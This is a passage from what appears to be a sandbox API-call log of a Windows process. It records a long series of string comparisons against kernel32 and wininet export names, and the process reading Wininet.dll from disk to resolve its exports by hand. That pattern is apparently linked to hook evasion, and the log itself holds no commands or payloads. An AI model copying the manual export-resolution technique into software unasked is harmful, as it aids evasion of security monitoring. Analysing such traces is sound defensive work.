lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.669] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.669] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0113.669] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0113.669] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0113.669] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0113.669] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0113.669] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0113.670] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0113.670] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0113.670] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0113.671] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.671] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0113.672] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0113.672] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0113.672] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0113.672] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0113.672] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0113.673] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0113.674] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0113.675] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0113.676] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0113.676] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0115.407] GetProcessHeap () returned 0x460000 [0115.407] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x48c5c0 | out: hHeap=0x460000) returned 1 [0115.407] GetProcessHeap () returned 0x460000 [0115.407] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x4791d0 [0115.407] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0115.576] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0115.576] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0115.576] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0115.577] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0115.577] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0115.577] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0115.577] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0115.577] GetProcessHeap () returned 0x460000 [0115.577] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x286600) returned 0x4071040 [0115.584] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0115.584] ReadFile (in: hFile=0x140, lpBuffer=0x4071040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4071040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0116.031] CloseHandle (hObject=0x140) returned 1 [0116.031] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0116.031] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0116.031] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0116.031] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0116.031] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0116.031] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0116.031] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0116.031] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0116.032] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0116.032] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0116.032] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0116.032] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0116.032] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0116.033] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0116.033] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0116.033] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0116.034] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0116.035] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0116.036] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.036] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", 